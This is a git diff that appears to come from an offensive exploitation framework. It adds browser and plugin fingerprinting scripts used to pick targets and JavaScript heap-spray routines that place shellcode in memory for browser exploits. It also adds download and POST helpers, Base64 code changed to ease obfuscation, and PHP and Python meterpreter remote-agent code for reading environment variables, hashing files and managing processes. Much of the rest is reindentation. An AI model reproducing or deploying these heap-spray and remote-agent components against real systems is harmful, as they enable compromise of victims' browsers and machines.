puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -0,0 +1,89 @@
window.ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
try {
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
}
catch (e) {
types[i-1] = null;
}
}
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == 'object')
{
version = "2012";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == null)
{
version = "2010";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == null && types[4] == null)
{
version = "2007";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
types[3] == null && types[4] == null)
{
version = "2003";
}
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
types[3] == null && types[4] == null)
{
// If run for the first time, you must manullay allow the "Microsoft Office XP"
// add-on to run. However, this prompt won't show because the ActiveXObject statement
// is wrapped in an exception handler.
version = "xp";
}
else {
version = null;
}
return version;
}

View File

@ -0,0 +1,110 @@
window.misc_addons_detect = { };
/**
* Detects whether the browser supports Silverlight or not
**/
window.misc_addons_detect.hasSilverlight = function () {
var found = false;
//
// When on IE, we can use AgControl.AgControl to actually detect the version too.
// But this ability is specific to IE, so we fall back to just true/false response
//
try {
var ax = new ActiveXObject('AgControl.AgControl');
found = true;
} catch(e) {}
//
// ActiveX didn't get anything, try looking in MIMEs
//
if (!found) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i < mimes.length; i++) {
if (/x\-silverlight/.test(mimes[i].type)) {
found = true;
break;
}
}
}
//
// MIMEs didn't work either. Try navigator.
//
if (!found) {
var count = navigator.plugins.length;
for (var i=0; i < count; i++) {
var pluginName = navigator.plugins[i].name;
if (/Silverlight Plug\-In/.test(pluginName)) {
found = true;
break;
}
}
}
return found;
}
/**
* Returns the Java version
**/
window.misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}

View File

@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
return d.style[propCamelCase] === css;
}
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//--
// Client
//--
@ -203,32 +210,46 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('HTMLTimeElement' in window) {
ua_version = '22.0'
if (css_is_valid('image-orientation',
'imageOrientation',
'0deg')) {
ua_version = '26.0';
} else if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document &&
document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0'
ua_version = '21.0';
} else if ('imul' in Math) {
ua_version = '20.0'
ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0'
ua_version = '19.0';
} else if ('devicePixelRatio' in window) {
ua_version = '18.0'
ua_version = '18.0';
} else if ('createElement' in document &&
document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) {
ua_version = '17.0'
ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0'
ua_version = '16.0';
} else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) {
ua_version = '15.0'
ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0'
ua_version = '14.0';
} else if ('Map' in window) {
ua_version = "13.0"
ua_version = "13.0";
} else if ('mozConnection' in navigator) {
ua_version = "12.0";
} else if ('mozVibrate' in navigator) {
@ -850,6 +871,12 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";

View File

@ -0,0 +1,17 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}

View File

@ -0,0 +1,31 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}

View File

@ -0,0 +1,38 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}

View File

@ -0,0 +1,18 @@
function ajax_download(oArg) {
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}

View File

@ -0,0 +1,10 @@
function postInfo(path, data) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.send(data);
}

View File

@ -0,0 +1,15 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}

126
data/js/utils/base64.js Normal file
View File

@ -0,0 +1,126 @@
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\r\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};

BIN
data/meterpreter/common.lib Executable file

Binary file not shown.

Binary file not shown.

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll Executable file

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043);
define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044);
# Environment
define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100);
define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101);
define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
# eval'd twice
my_print("Evaling stdapi");
##
##
# Search Helpers
##
@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
*/
if (!function_exists('safe_glob')) {
function safe_glob($pattern, $flags=0) {
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
}
}
/**
@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
*/
if (!function_exists('fnmatch')) {
function fnmatch($pattern, $string) {
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
}
}
@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
else
$array[$key] = $string.$element;
return $array;
}
}
@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
return ERROR_SUCCESS;
}
@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
return ERROR_SUCCESS;
}
@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
}
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
$variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
# If we decide some day to have sys.config.getenv return all env
# vars when given an empty search list, this is one way to do it.
#if (empty($variable_tlvs)) {
# # We don't have a var to look up, return all of 'em
# $variables = array_keys($_SERVER);
#} else {
# $variables = array();
# foreach ($variable_tlvs as $tlv) {
# array_push($variables, $tlv['value']);
# }
#}
foreach ($variable_tlvs as $name) {
$canonical_name = str_replace(array("$","%"), "", $name['value']);
$env = getenv($canonical_name);
if ($env !== FALSE) {
$grp = "";
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
}
}
return ERROR_SUCCESS;
}
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
@ -696,24 +739,24 @@ function close_process($proc) {
foreach ($proc['pipes'] as $f) {
@fclose($f);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
unset($channel_process_map[$proc['cid']]);
}

View File

@ -86,168 +86,185 @@ TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
##
# Fs
##
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
# Net
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
